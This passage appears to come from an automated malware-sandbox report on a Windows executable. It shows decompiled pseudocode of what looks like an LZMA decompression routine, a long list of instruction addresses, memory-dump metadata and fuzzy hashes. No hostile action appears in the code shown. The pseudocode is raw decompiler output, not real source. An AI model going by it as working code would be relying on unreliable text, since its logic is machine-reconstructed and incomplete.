												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                                0x00000000
                                                                0x00406473
                                                                0x00406473
                                                                0x00406477
                                                                0x00406498
                                                                0x0040649f
                                                                0x004064a5
                                                                0x004064ab
                                                                0x004064bd
                                                                0x004064c3
                                                                0x004064c8
                                                                0x00000000
                                                                0x00406479
                                                                0x0040647f
                                                                0x00406840
                                                                0x00406840
                                                                0x00406840
                                                                0x00406843
                                                                0x00406843
                                                                0x00406843
                                                                0x00406849
                                                                0x0040684f
                                                                0x00406855
                                                                0x0040686f
                                                                0x00406872
                                                                0x00406878
                                                                0x00406883
                                                                0x00406885
                                                                0x00406857
                                                                0x00406857
                                                                0x00406866
                                                                0x0040686a
                                                                0x0040686a
                                                                0x0040688f
                                                                0x00000000
                                                                0x00000000
                                                                0x00406891
                                                                0x00406895
                                                                0x00406a44
                                                                0x00406a5a
                                                                0x00406a62
                                                                0x00406a69
                                                                0x00406a6b
                                                                0x00406a72
                                                                0x00406a76
                                                                0x00406a76
                                                                0x004068a1
                                                                0x004068a8
                                                                0x004068b0
                                                                0x004068b3
                                                                0x004068b6
                                                                0x004068b6
                                                                0x004068bc
                                                                0x004068bc
                                                                0x00406058
                                                                0x00406058
                                                                0x00406058
                                                                0x00406061
                                                                0x00000000
                                                                0x00000000
                                                                0x00406067
                                                                0x00000000
                                                                0x00406072
                                                                0x00000000
                                                                0x00000000
                                                                0x0040607b
                                                                0x0040607e
                                                                0x00406081
                                                                0x00406085
                                                                0x00000000
                                                                0x00000000
                                                                0x0040608b
                                                                0x0040608e
                                                                0x00406090
                                                                0x00406091
                                                                0x00406094
                                                                0x00406096
                                                                0x00406097
                                                                0x00406099
                                                                0x0040609c
                                                                0x004060a1
                                                                0x004060a6
                                                                0x004060af
                                                                0x004060c2
                                                                0x004060c5
                                                                0x004060d1
                                                                0x004060f9
                                                                0x004060fb
                                                                0x00406109
                                                                0x00406109
                                                                0x0040610d
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004060fd
                                                                0x004060fd
                                                                0x00406100
                                                                0x00406101
                                                                0x00406101
                                                                0x00000000
                                                                0x004060fd
                                                                0x004060d7
                                                                0x004060dc
                                                                0x004060dc
                                                                0x004060e5
                                                                0x004060ed
                                                                0x004060f0
                                                                0x00000000
                                                                0x004060f6
                                                                0x004060f6
                                                                0x00000000
                                                                0x004060f6
                                                                0x00000000
                                                                0x00406113
                                                                0x00406113
                                                                0x00406117
                                                                0x004069c3
                                                                0x00000000
                                                                0x004069c3
                                                                0x00406120
                                                                0x00406130
                                                                0x00406133
                                                                0x00406136
                                                                0x00406136
                                                                0x00406136
                                                                0x00406139
                                                                0x0040613d
                                                                0x00000000
                                                                0x00000000
                                                                0x0040613f
                                                                0x00406145
                                                                0x0040616f
                                                                0x00406175
                                                                0x0040617c
                                                                0x00000000
                                                                0x0040617c
                                                                0x0040614b
                                                                0x0040614e
                                                                0x00406153
                                                                0x00406153
                                                                0x0040615e
                                                                0x00406166
                                                                0x00406169
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004061ae
                                                                0x004061b4
                                                                0x004061b7
                                                                0x004061c4
                                                                0x004061cc
                                                                0x00000000
                                                                0x00000000
                                                                0x00406183
                                                                0x00406183
                                                                0x00406187
                                                                0x004069d2
                                                                0x00000000
                                                                0x004069d2
                                                                0x00406193
                                                                0x0040619e
                                                                0x0040619e
                                                                0x0040619e
                                                                0x004061a1
                                                                0x004061a4
                                                                0x004061a7
                                                                0x004061ac
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00406843
                                                                0x00406843
                                                                0x00406849
                                                                0x0040684f
                                                                0x00406855
                                                                0x0040686f
                                                                0x00406872
                                                                0x00406878
                                                                0x00406883
                                                                0x00406885
                                                                0x00406857
                                                                0x00406857
                                                                0x00406866
                                                                0x0040686a
                                                                0x0040686a
                                                                0x0040688f
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004061d4
                                                                0x004061d6
                                                                0x004061d9
                                                                0x0040624a
                                                                0x0040624d
                                                                0x00406250
                                                                0x00406257
                                                                0x00406261
                                                                0x00406840
                                                                0x00406840
                                                                0x00000000
                                                                0x00406840
                                                                0x004061db
                                                                0x004061df
                                                                0x004061e2
                                                                0x004061e4
                                                                0x004061e7
                                                                0x004061ea
                                                                0x004061ec
                                                                0x004061ef
                                                                0x004061f1
                                                                0x004061f6
                                                                0x004061f9
                                                                0x004061fc
                                                                0x00406200
                                                                0x00406207
                                                                0x0040620a
                                                                0x00406211
                                                                0x00406215
                                                                0x0040621d
                                                                0x0040621d
                                                                0x0040621d
                                                                0x00406217
                                                                0x00406217
                                                                0x00406217
                                                                0x0040620c
                                                                0x0040620c
                                                                0x0040620c
                                                                0x00406221
                                                                0x00406224
                                                                0x00406242
                                                                0x00406244
                                                                0x00000000
                                                                0x00406226
                                                                0x00406226
                                                                0x00406229
                                                                0x0040622c
                                                                0x0040622f
                                                                0x00406231
                                                                0x00406231
                                                                0x00406231
                                                                0x00406234
                                                                0x00406237
                                                                0x00406239
                                                                0x0040623a
                                                                0x0040623d
                                                                0x00000000
                                                                0x0040623d
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004064dd
                                                                0x004064e1
                                                                0x00406504
                                                                0x00406507
                                                                0x0040650a
                                                                0x00406514
                                                                0x004064e3
                                                                0x004064e3
                                                                0x004064e6
                                                                0x004064e9
                                                                0x004064ec
                                                                0x004064f9
                                                                0x004064fc
                                                                0x004064fc
                                                                0x00406840
                                                                0x00406840
                                                                0x00406840
                                                                0x00000000
                                                                0x00406840
                                                                0x00000000
                                                                0x00406520
                                                                0x00406524
                                                                0x00000000
                                                                0x00000000
                                                                0x0040652a
                                                                0x0040652e
                                                                0x00000000
                                                                0x00000000
                                                                0x00406534
                                                                0x00406536
                                                                0x0040653a
                                                                0x0040653a
                                                                0x0040653d
                                                                0x00406541
                                                                0x00000000
                                                                0x00000000
                                                                0x00406591
                                                                0x00406595
                                                                0x0040659c
                                                                0x0040659f
                                                                0x004065a2
                                                                0x004065ac
                                                                0x00406840
                                                                0x00406840
                                                                0x00406840
                                                                0x00000000
                                                                0x00406840
                                                                0x00406840
                                                                0x00406597
                                                                0x00000000
                                                                0x00000000
                                                                0x004065b8
                                                                0x004065bc
                                                                0x004065c3
                                                                0x004065c6
                                                                0x004065c9
                                                                0x004065be
                                                                0x004065be
                                                                0x004065be
                                                                0x004065cc
                                                                0x004065cf
                                                                0x004065d2
                                                                0x004065d2
                                                                0x004065d5
                                                                0x004065d8
                                                                0x004065db
                                                                0x004065db
                                                                0x004065de
                                                                0x004065e5
                                                                0x004065ea
                                                                0x00000000
                                                                0x00000000
                                                                0x00406678
                                                                0x00406678
                                                                0x0040667c
                                                                0x00406a1a
                                                                0x00000000
                                                                0x00406a1a
                                                                0x00406682
                                                                0x00406685
                                                                0x00406688
                                                                0x0040668c
                                                                0x0040668f
                                                                0x00406695
                                                                0x00406697
                                                                0x00406697
                                                                0x00406697
                                                                0x0040669a
                                                                0x0040669d
                                                                0x00000000
                                                                0x00000000
                                                                0x0040626d
                                                                0x0040626d
                                                                0x00406271
                                                                0x004069de
                                                                0x00000000
                                                                0x004069de
                                                                0x00406277
                                                                0x0040627a
                                                                0x0040627d
                                                                0x00406281
                                                                0x00406284
                                                                0x0040628a
                                                                0x0040628c
                                                                0x0040628c
                                                                0x0040628c
                                                                0x0040628f
                                                                0x00406292
                                                                0x00406292
                                                                0x00406295
                                                                0x00406298
                                                                0x00000000
                                                                0x00000000
                                                                0x0040629e
                                                                0x004062a4
                                                                0x00000000
                                                                0x00000000
                                                                0x004062aa
                                                                0x004062aa
                                                                0x004062ae
                                                                0x004062b1
                                                                0x004062b4
                                                                0x004062b7
                                                                0x004062ba
                                                                0x004062bb
                                                                0x004062be
                                                                0x004062c0
                                                                0x004062c6
                                                                0x004062c9
                                                                0x004062cc
                                                                0x004062cf
                                                                0x004062d2
                                                                0x004062d5
                                                                0x004062d8
                                                                0x004062f4
                                                                0x004062f7
                                                                0x004062fa
                                                                0x004062fd
                                                                0x00406304
                                                                0x00406308
                                                                0x0040630a
                                                                0x0040630e
                                                                0x004062da
                                                                0x004062da
                                                                0x004062de
                                                                0x004062e6
                                                                0x004062eb
                                                                0x004062ed
                                                                0x004062ef
                                                                0x004062ef
                                                                0x00406311
                                                                0x00406318
                                                                0x0040631b
                                                                0x00000000
                                                                0x00406321
                                                                0x00000000
                                                                0x00406321
                                                                0x00000000
                                                                0x00406326
                                                                0x00406326
                                                                0x0040632a
                                                                0x004069ea
                                                                0x00000000
                                                                0x004069ea
                                                                0x00406330
                                                                0x00406333
                                                                0x00406336
                                                                0x0040633a
                                                                0x0040633d
                                                                0x00406343
                                                                0x00406345
                                                                0x00406345
                                                                0x00406345
                                                                0x00406348
                                                                0x0040634b
                                                                0x0040634b
                                                                0x0040634b
                                                                0x00406351
                                                                0x00000000
                                                                0x00000000
                                                                0x00406353
                                                                0x00406356
                                                                0x00406359
                                                                0x0040635c
                                                                0x0040635f
                                                                0x00406362
                                                                0x00406365
                                                                0x00406368
                                                                0x0040636b
                                                                0x0040636e
                                                                0x00406371
                                                                0x00406389
                                                                0x0040638c
                                                                0x0040638f
                                                                0x00406392
                                                                0x00406392
                                                                0x00406395
                                                                0x00406399
                                                                0x0040639b
                                                                0x00406373
                                                                0x00406373
                                                                0x0040637b
                                                                0x00406380
                                                                0x00406382
                                                                0x00406384
                                                                0x00406384
                                                                0x0040639e
                                                                0x004063a5
                                                                0x004063a8
                                                                0x00000000
                                                                0x004063aa
                                                                0x00000000
                                                                0x004063aa
                                                                0x004063a8
                                                                0x004063af
                                                                0x004063af
                                                                0x004063af
                                                                0x004063af
                                                                0x00000000
                                                                0x00000000
                                                                0x004063ea
                                                                0x004063ea
                                                                0x004063ee
                                                                0x004069f6
                                                                0x00000000
                                                                0x004069f6
                                                                0x004063f4
                                                                0x004063f7
                                                                0x004063fa
                                                                0x004063fe
                                                                0x00406401
                                                                0x00406407
                                                                0x00406409
                                                                0x00406409
                                                                0x00406409
                                                                0x0040640c
                                                                0x0040640f
                                                                0x0040640f
                                                                0x00406415
                                                                0x004063b3
                                                                0x004063b3
                                                                0x004063b6
                                                                0x00000000
                                                                0x004063b6
                                                                0x00406417
                                                                0x00406417
                                                                0x0040641a
                                                                0x0040641d
                                                                0x00406420
                                                                0x00406423
                                                                0x00406426
                                                                0x00406429
                                                                0x0040642c
                                                                0x0040642f
                                                                0x00406432
                                                                0x00406435
                                                                0x0040644d
                                                                0x00406450
                                                                0x00406453
                                                                0x00406456
                                                                0x00406456
                                                                0x00406459
                                                                0x0040645d
                                                                0x0040645f
                                                                0x00406437
                                                                0x00406437
                                                                0x0040643f
                                                                0x00406444
                                                                0x00406446
                                                                0x00406448
                                                                0x00406448
                                                                0x00406462
                                                                0x00406469
                                                                0x0040646c
                                                                0x00000000
                                                                0x0040646e
                                                                0x00000000
                                                                0x0040646e
                                                                0x00000000
                                                                0x004066fb
                                                                0x004066fb
                                                                0x004066ff
                                                                0x00406a26
                                                                0x00000000
                                                                0x00406a26
                                                                0x00406705
                                                                0x00406708
                                                                0x0040670b
                                                                0x0040670f
                                                                0x00406712
                                                                0x00406718
                                                                0x0040671a
                                                                0x0040671a
                                                                0x0040671a
                                                                0x0040671d
                                                                0x00000000
                                                                0x00000000
                                                                0x004064cb
                                                                0x004064cb
                                                                0x004064ce
                                                                0x00406840
                                                                0x00406840
                                                                0x00406840
                                                                0x00000000
                                                                0x00406840
                                                                0x00000000
                                                                0x0040680a
                                                                0x0040680e
                                                                0x00406830
                                                                0x00406833
                                                                0x0040683d
                                                                0x00406840
                                                                0x00406840
                                                                0x00406840
                                                                0x00000000
                                                                0x00406840
                                                                0x00406840
                                                                0x00406810
                                                                0x00406813
                                                                0x00406817
                                                                0x0040681a
                                                                0x0040681a
                                                                0x0040681d
                                                                0x00000000
                                                                0x00000000
                                                                0x004068c7
                                                                0x004068cb
                                                                0x004068e9
                                                                0x004068e9
                                                                0x004068e9
                                                                0x004068f0
                                                                0x004068f7
                                                                0x004068fe
                                                                0x004068fe
                                                                0x00000000
                                                                0x004068fe
                                                                0x004068cd
                                                                0x004068d0
                                                                0x004068d3
                                                                0x004068d6
                                                                0x004068dd
                                                                0x00406821
                                                                0x00406821
                                                                0x00406824
                                                                0x00000000
                                                                0x00000000
                                                                0x004069b8
                                                                0x004069bb
                                                                0x004068bc
                                                                0x00000000
                                                                0x00000000
                                                                0x004065f2
                                                                0x004065f4
                                                                0x004065fb
                                                                0x004065fc
                                                                0x004065fe
                                                                0x00406601
                                                                0x00000000
                                                                0x00000000
                                                                0x00406609
                                                                0x0040660c
                                                                0x0040660f
                                                                0x00406611
                                                                0x00406613
                                                                0x00406613
                                                                0x00406614
                                                                0x00406617
                                                                0x0040661e
                                                                0x00406621
                                                                0x0040662f
                                                                0x00000000
                                                                0x00000000
                                                                0x00406905
                                                                0x00406905
                                                                0x00406908
                                                                0x0040690f
                                                                0x00000000
                                                                0x00000000
                                                                0x00406914
                                                                0x00406914
                                                                0x00406918
                                                                0x00406a50
                                                                0x00000000
                                                                0x00406a50
                                                                0x0040691e
                                                                0x00406921
                                                                0x00406924
                                                                0x00406928
                                                                0x0040692b
                                                                0x00406931
                                                                0x00406933
                                                                0x00406933
                                                                0x00406933
                                                                0x00406936
                                                                0x00406939
                                                                0x00406939
                                                                0x00406939
                                                                0x00406939
                                                                0x0040693c
                                                                0x0040693c
                                                                0x00406940
                                                                0x004069a0
                                                                0x004069a3
                                                                0x004069a8
                                                                0x004069a9
                                                                0x004069ab
                                                                0x004069ad
                                                                0x004069b0
                                                                0x004068bc
                                                                0x004068bc
                                                                0x00000000
                                                                0x004068c2
                                                                0x004068bc
                                                                0x00406942
                                                                0x00406948
                                                                0x0040694b
                                                                0x0040694e
                                                                0x00406951
                                                                0x00406954
                                                                0x00406957
                                                                0x0040695a
                                                                0x0040695d
                                                                0x00406960
                                                                0x00406963
                                                                0x0040697c
                                                                0x0040697f
                                                                0x00406982
                                                                0x00406985
                                                                0x00406989
                                                                0x0040698b
                                                                0x0040698b
                                                                0x0040698c
                                                                0x0040698f
                                                                0x00406965
                                                                0x00406965
                                                                0x0040696d
                                                                0x00406972
                                                                0x00406974
                                                                0x00406977
                                                                0x00406977
                                                                0x00406992
                                                                0x00406999
                                                                0x00000000
                                                                0x0040699b
                                                                0x00000000
                                                                0x0040699b
                                                                0x00000000
                                                                0x00406637
                                                                0x0040663a
                                                                0x00406670
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a3
                                                                0x004067a3
                                                                0x004067a6
                                                                0x004067a8
                                                                0x00406a32
                                                                0x00000000
                                                                0x00406a32
                                                                0x004067ae
                                                                0x004067b1
                                                                0x00000000
                                                                0x00000000
                                                                0x004067b7
                                                                0x004067bb
                                                                0x004067be
                                                                0x004067be
                                                                0x004067be
                                                                0x00000000
                                                                0x004067be
                                                                0x0040663c
                                                                0x0040663e
                                                                0x00406640
                                                                0x00406642
                                                                0x00406645
                                                                0x00406646
                                                                0x00406648
                                                                0x0040664a
                                                                0x0040664d
                                                                0x00406650
                                                                0x00406666
                                                                0x0040666b
                                                                0x004066a3
                                                                0x004066a3
                                                                0x004066a7
                                                                0x004066d3
                                                                0x004066d5
                                                                0x004066dc
                                                                0x004066df
                                                                0x004066e2
                                                                0x004066e2
                                                                0x004066e7
                                                                0x004066e7
                                                                0x004066e9
                                                                0x004066ec
                                                                0x004066f3
                                                                0x004066f6
                                                                0x00406723
                                                                0x00406723
                                                                0x00406726
                                                                0x00406729
                                                                0x0040679d
                                                                0x0040679d
                                                                0x0040679d
                                                                0x00000000
                                                                0x0040679d
                                                                0x0040672b
                                                                0x00406731
                                                                0x00406734
                                                                0x00406737
                                                                0x0040673a
                                                                0x0040673d
                                                                0x00406740
                                                                0x00406743
                                                                0x00406746
                                                                0x00406749
                                                                0x0040674c
                                                                0x00406765
                                                                0x00406767
                                                                0x0040676a
                                                                0x0040676b
                                                                0x0040676e
                                                                0x00406770
                                                                0x00406773
                                                                0x00406775
                                                                0x00406777
                                                                0x0040677a
                                                                0x0040677c
                                                                0x0040677f
                                                                0x00406783
                                                                0x00406785
                                                                0x00406785
                                                                0x00406786
                                                                0x00406789
                                                                0x0040678c
                                                                0x0040674e
                                                                0x0040674e
                                                                0x00406756
                                                                0x0040675b
                                                                0x0040675d
                                                                0x00406760
                                                                0x00406760
                                                                0x0040678f
                                                                0x00406796
                                                                0x00406720
                                                                0x00406720
                                                                0x00406720
                                                                0x00406720
                                                                0x00000000
                                                                0x00406798
                                                                0x00000000
                                                                0x00406798
                                                                0x00406796
                                                                0x004066a9
                                                                0x004066ac
                                                                0x004066ae
                                                                0x004066b1
                                                                0x004066b4
                                                                0x004066b7
                                                                0x004066b9
                                                                0x004066bc
                                                                0x004066bf
                                                                0x004066bf
                                                                0x004066c2
                                                                0x004066c2
                                                                0x004066c5
                                                                0x004066cc
                                                                0x004066a0
                                                                0x004066a0
                                                                0x004066a0
                                                                0x004066a0
                                                                0x00000000
                                                                0x004066ce
                                                                0x00000000
                                                                0x004066ce
                                                                0x004066cc
                                                                0x00406652
                                                                0x00406655
                                                                0x00406657
                                                                0x0040665a
                                                                0x00000000
                                                                0x00000000
                                                                0x004063b9
                                                                0x004063b9
                                                                0x004063bd
                                                                0x00406a02
                                                                0x00000000
                                                                0x00406a02
                                                                0x004063c3
                                                                0x004063c6
                                                                0x004063c9
                                                                0x004063cc
                                                                0x004063cf
                                                                0x004063d2
                                                                0x004063d5
                                                                0x004063d7
                                                                0x004063da
                                                                0x004063dd
                                                                0x004063e0
                                                                0x004063e2
                                                                0x004063e2
                                                                0x004063e2
                                                                0x00000000
                                                                0x00000000
                                                                0x00406544
                                                                0x00406544
                                                                0x00406548
                                                                0x00406a0e
                                                                0x00000000
                                                                0x00406a0e
                                                                0x0040654e
                                                                0x00406551
                                                                0x00406554
                                                                0x00406557
                                                                0x00406559
                                                                0x00406559
                                                                0x00406559
                                                                0x0040655c
                                                                0x0040655f
                                                                0x00406562
                                                                0x00406565
                                                                0x00406568
                                                                0x0040656b
                                                                0x0040656c
                                                                0x0040656e
                                                                0x0040656e
                                                                0x0040656e
                                                                0x00406571
                                                                0x00406574
                                                                0x00406577
                                                                0x0040657a
                                                                0x0040657a
                                                                0x0040657a
                                                                0x0040657d
                                                                0x0040657f
                                                                0x0040657f
                                                                0x00000000
                                                                0x00000000
                                                                0x004067c1
                                                                0x004067c1
                                                                0x004067c1
                                                                0x004067c5
                                                                0x00000000
                                                                0x00000000
                                                                0x004067cb
                                                                0x004067ce
                                                                0x004067d1
                                                                0x004067d4
                                                                0x004067d6
                                                                0x004067d6
                                                                0x004067d6
                                                                0x004067d9
                                                                0x004067dc
                                                                0x004067df
                                                                0x004067e2
                                                                0x004067e5
                                                                0x004067e8
                                                                0x004067e9
                                                                0x004067eb
                                                                0x004067eb
                                                                0x004067eb
                                                                0x004067ee
                                                                0x004067f1
                                                                0x004067f4
                                                                0x004067f7
                                                                0x004067fa
                                                                0x004067fe
                                                                0x00406800
                                                                0x00406803
                                                                0x00000000
                                                                0x00406805
                                                                0x00406582
                                                                0x00406582
                                                                0x00000000
                                                                0x00406582
                                                                0x00406803
                                                                0x00406a38
                                                                0x00000000
                                                                0x00000000
                                                                0x00406067
                                                                0x00406a6f
                                                                0x00406a6f
                                                                0x00000000
                                                                0x00406a6f
                                                                0x004068bc
                                                                0x00406843
                                                                0x00406840
                                                                0x00000000
                                                                0x00406477

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                                                • Instruction ID: ed496f49c15cb1a0cee1f91230a4d4bd76d3fd25087baa69d2252d5f7e71f344
                                                                • Opcode Fuzzy Hash: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                                                • Instruction Fuzzy Hash: 30713271E00228CFDF28DFA8C8547ADBBB1FB44305F15806AD906BB281D7785A96DF44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00406591, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 98%
                                                                			E00406591() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
